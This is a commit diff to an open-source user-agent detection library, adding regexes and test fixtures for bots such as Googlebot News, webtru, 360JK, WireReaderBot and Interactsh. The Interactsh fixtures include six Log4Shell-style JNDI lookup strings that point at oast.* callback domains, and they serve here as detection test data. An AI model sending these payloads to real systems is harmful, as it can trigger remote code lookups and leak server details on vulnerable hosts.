Commit

Adds detection for various bots (matomo-org#7612)
* Improves detection for Googlebot News
* Adds detection for Interactsh
* Adds detection for webtru
* Adds detection for URLSuMaBot
* Adds detection for 360JK
* Improves detection for generic bots
* Improves detection for generic bots
* Adds detection for UCSB Network Measurement
* Adds detection for Plesk Screenshot Service
* Improves detection for Yahoo! Japan
* Adds detection for Who.is Bot
* Adds detection for Electron Fetch
* Adds detection for WireReaderBot
---------

Co-authored-by: Tutik Alexsandr <[email protected]>
liviuconcioiu and sanchezzzhak authored Mar 11, 2024
1 parent cd99c14 commit 29b5c5d
Showing 4 changed files with 237 additions and 7 deletions.
6 changes: 6 additions & 0 deletions Tests/Parser/Client/fixtures/library.yml
@@ -641,3 +641,9 @@
type: library
name: Kiwi TCMS API
version: 12.7
-
user_agent: electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch)
client:
type: library
name: Electron Fetch
version: "1.0"
146 changes: 143 additions & 3 deletions Tests/fixtures/bots.yml
@@ -1331,7 +1331,7 @@
-
user_agent: Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22))
bot:
-name: Googlebot
+name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
@@ -4203,8 +4203,8 @@
url: https://github.com/projectdiscovery/httpx
category: Crawler
producer:
-name: ""
-url: ""
+name: ProjectDiscovery, Inc.
+url: https://projectdiscovery.io/
-
user_agent: 'Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: [email protected]'
bot:
@@ -7205,3 +7205,143 @@
producer:
name: Open Technologies Bulgaria, Ltd.
url: https://kiwitcms.org
-
user_agent: Googlebot-News
bot:
name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
name: Google Inc.
url: https://www.google.com/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.online}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.site}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.fun}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.me}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler
bot:
name: webtru
category: Crawler
url: https://webtru.io/
producer:
name: DataSign Inc.
url: https://datasign.jp/
-
user_agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko; compatible; URLSuMaBot / 1.0; +https://www.urlsuma.de/bot.aspx) Chrome / 70.0.3538.77 Safari / 537.36
bot:
name: URLSuMaBot
category: Crawler
url: https://www.urlsuma.de/
-
user_agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) 360JK yunjiankong 427691
bot:
name: 360JK
category: Site Monitor
url: http://jk.cloud.360.cn/
producer:
name: 360 Security Technology Inc.
url: https://www.360.cn/
-
user_agent: LinkChain
bot:
name: Generic Bot
-
user_agent: Morfeus Fucking Scanner
bot:
name: Generic Bot
-
user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 UCSBNetworkMeasurement/2023 (contact; stijn; at; ucsb.edu;)
bot:
name: UCSB Network Measurement
category: Crawler
url: https://www.it.ucsb.edu/
producer:
name: University of California, Santa Barbara
url: https://www.it.ucsb.edu/
-
user_agent: Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066
bot:
name: Plesk Screenshot Service
category: Service Agent
url: https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service
producer:
name: Plesk International GmbH
url: https://www.plesk.com/
-
user_agent: Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955)
bot:
name: Yahoo! Japan ASR
category: Crawler
url: https://support.yahoo-net.jp/PccSearch/s/article/H000007955
producer:
name: Yahoo! Japan Corp.
url: https://www.yahoo.co.jp/
-
user_agent: Who.is Bot
bot:
name: Who.is Bot
category: Crawler
url: https://who.is/
-
user_agent: Mozilla/5.0 (compatible; WireReaderBot/1.0; +https://wirereader.app)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
-
user_agent: WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
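
Note on the Interactsh fixtures: the six user agents above differ only in the top-level domain after `.oast.`, so a single pattern can cover all of them. A minimal Python sketch of that check follows, assuming case-insensitive search semantics. The helper `interactsh_user_agent` and the run of `x` characters standing in for the redacted callback id are illustrative and not part of the repository.

```python
import re

# Pattern copied from the Interactsh rule added to regexes/bots.yml in this commit.
INTERACTSH = re.compile(r".*\.oast\.", re.IGNORECASE)

# Top-level domains that appear in the six fixtures.
TLDS = ["live", "pro", "online", "site", "fun", "me"]


def interactsh_user_agent(tld):
    """Build a fixture-shaped user agent (hypothetical helper).

    The "x" run is only a placeholder for the redacted callback id.
    """
    return "${jndi:ldap://${hostName}.useragent." + "x" * 33 + ".oast." + tld + "}"


# Map each TLD to whether the pattern matches the corresponding user agent.
matches = {tld: bool(INTERACTSH.search(interactsh_user_agent(tld))) for tld in TLDS}

for tld, matched in matches.items():
    print(tld, matched)
```

A user agent that lacks the literal `.oast.` sequence, for example one that merely contains the word `toast`, is not matched by this pattern.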
87 changes: 83 additions & 4 deletions regexes/bots.yml
@@ -5,6 +5,11 @@
# @license http://www.gnu.org/licenses/lgpl.html LGPL v3 or later
###############

- regex: 'WireReaderBot(?:/([\d+.]+))?'
name: 'WireReaderBot'
category: 'Feed Fetcher'
url: 'https://wirereader.app/'

- regex: 'monitoring360bot'
name: '360 Monitoring'
category: 'Site Monitor'
@@ -768,6 +773,14 @@
name: 'Visual Meta'
url: 'https://www.shopalike.cz/'

- regex: 'Googlebot-News'
name: 'Googlebot News'
category: 'Search bot'
url: 'https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers'
producer:
name: 'Google Inc.'
url: 'https://www.google.com/'

- regex: 'Adwords-(?:DisplayAds|Express|Instant)|Google Web Preview|Google[ -]Publisher[ -]Plugin|Google-(?:Ads-Conversions|Ads-Qualify|Adwords|AMPHTML|Assess|Extended|HotelAdsVerifier|InspectionTool|Lens|PageRenderer|Read-Aloud|Safety|Shopping-Quality|Site-Verification|speakr|Stale-Content-Probe|Test|Youtube-Links)|(?:AdsBot|APIs|DuplexWeb|Feedfetcher|Mediapartners)-Google(?:-Mobile)?|Google(?:AdSenseInfeed|AssociationService|bot|Other|Prober|Producer)|Google.*/\+/web/snippet'
name: 'Googlebot'
category: 'Search bot'
@@ -1912,6 +1925,22 @@
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Y!J-ASR'
name: 'Yahoo! Japan ASR'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: '^Y!J'
name: 'Yahoo! Japan'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Yandex(?:(?:\.Gazeta |Accessibility|Mobile|MobileScreenShot|RenderResources|Screenshot|Sprav)?Bot|(?:AdNet|Antivirus|Blogs|Calendar|Catalog|Direct|Favicons|ForDomain|ImageResizer|Images|Market|Media|Metrika|News|OntoDB(?:API)?|Pagechecker|Partner|RCA|SearchShop|(?:News|Site)links|Tracker|Turbo|Userproxy|Verticals|Vertis|Video|Webmaster))|YaDirectFetcher'
name: 'Yandex Bot'
category: 'Search bot'
@@ -2576,8 +2605,16 @@
url: 'https://github.com/projectdiscovery/httpx'
category: 'Crawler'
producer:
-name: ''
-url: ''
+name: 'ProjectDiscovery, Inc.'
+url: 'https://projectdiscovery.io/'

- regex: '.*\.oast\.'
name: 'Interactsh'
category: 'Security Checker'
url: 'https://github.com/projectdiscovery/interactsh'
producer:
name: 'ProjectDiscovery, Inc.'
url: 'https://projectdiscovery.io/'

- regex: 'scaninfo@(?:expanseinc|paloaltonetworks)\.com'
name: 'Expanse'
@@ -4237,10 +4274,52 @@
name: 'Open Technologies Bulgaria, Ltd.'
url: 'https://kiwitcms.org'

- regex: 'webtru_crawler'
name: 'webtru'
category: 'Crawler'
url: 'https://webtru.io/'
producer:
name: 'DataSign Inc.'
url: 'https://datasign.jp/'

- regex: 'URLSuMaBot'
name: 'URLSuMaBot'
category: 'Crawler'
url: 'https://www.urlsuma.de/'

- regex: '360JK yunjiankong'
name: '360JK'
category: 'Site Monitor'
url: 'http://jk.cloud.360.cn/'
producer:
name: '360 Security Technology Inc.'
url: 'https://www.360.cn/'

- regex: 'UCSBNetworkMeasurement'
name: 'UCSB Network Measurement'
category: 'Crawler'
url: 'https://www.it.ucsb.edu/'
producer:
name: 'University of California, Santa Barbara'
url: 'https://www.it.ucsb.edu/'

- regex: 'Plesk screenshot bot'
name: 'Plesk Screenshot Service'
category: 'Service Agent'
url: 'https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service'
producer:
name: 'Plesk International GmbH'
url: 'https://www.plesk.com/'

- regex: 'Who.is'
name: 'Who.is Bot'
category: 'Crawler'
url: 'https://who.is/'

# Generic bots
-- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
+- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
name: 'Generic Bot'

# Generic detections
-- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
+- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scanner|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
name: 'Generic Bot'
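
Note on rule order: several additions in this file appear to rely on a more specific rule being tried before a broader one (WireReaderBot before Googlebot, `Googlebot-News` before Googlebot, `Y!J-ASR` before `^Y!J`). The Python sketch below illustrates the idea, assuming the parser returns the first matching rule and matches case-insensitively. The `RULES` list and the `detect` function are hypothetical, the Googlebot and generic patterns are shortened stand-ins for the full patterns in the diff, and any extra boundary handling in the real matcher is omitted.

```python
import re

# Ordered subset of rules from this diff. Order matters: the first match wins.
RULES = [
    (r"WireReaderBot(?:/([\d+.]+))?", "WireReaderBot"),
    (r"Googlebot-News", "Googlebot News"),
    (r"Google(?:bot|Other)", "Googlebot"),    # shortened stand-in (assumption)
    (r"Y!J-ASR", "Yahoo! Japan ASR"),
    (r"^Y!J", "Yahoo! Japan"),
    (r"scanner(?:[^a-z]|$)", "Generic Bot"),  # reduced generic rule (assumption)
]


def detect(user_agent):
    """Return the name of the first rule that matches, or None."""
    for pattern, name in RULES:
        if re.search(pattern, user_agent, re.IGNORECASE):
            return name
    return None


# User agents taken from Tests/fixtures/bots.yml in this commit.
print(detect("WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"))
print(detect("Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22))"))
print(detect("Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955)"))
print(detect("Morfeus Fucking Scanner"))
```

Under these assumptions, moving the shortened Googlebot rule to the top of `RULES` would label both the WireReaderBot and the Googlebot-News user agents as plain Googlebot, which is the situation the new rule placement avoids.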
5 changes: 5 additions & 0 deletions regexes/client/libraries.yml
@@ -250,6 +250,11 @@
version: '$1'
url: 'https://github.com/node-fetch/node-fetch'

- regex: 'electron-fetch/?(\d+[\.\d]+)?'
name: 'Electron Fetch'
version: '$1'
url: 'https://github.com/arantes555/electron-fetch'

- regex: 'ReactorNetty/(\d+[\.\d]+)'
name: 'ReactorNetty'
version: '$1'
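
Note on the version capture: in the `electron-fetch` rule the whole version group is optional, and `\d+[\.\d]+` needs at least two characters, so a bare `electron-fetch` token (or a single-digit version) still matches but yields no version. A small Python sketch follows, assuming `$1` refers to the first capture group and that an unmatched group is treated as an empty version. The helper `electron_fetch_version` is hypothetical.

```python
import re

# Pattern copied from the Electron Fetch rule in regexes/client/libraries.yml.
ELECTRON_FETCH = re.compile(r"electron-fetch/?(\d+[\.\d]+)?", re.IGNORECASE)


def electron_fetch_version(user_agent):
    """Return the captured version, "" if the rule matches without a
    version, or None if the rule does not match at all."""
    match = ELECTRON_FETCH.search(user_agent)
    if match is None:
        return None
    return match.group(1) or ""


# User agent taken from Tests/Parser/Client/fixtures/library.yml.
fixture = "electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch)"
print(electron_fetch_version(fixture))
```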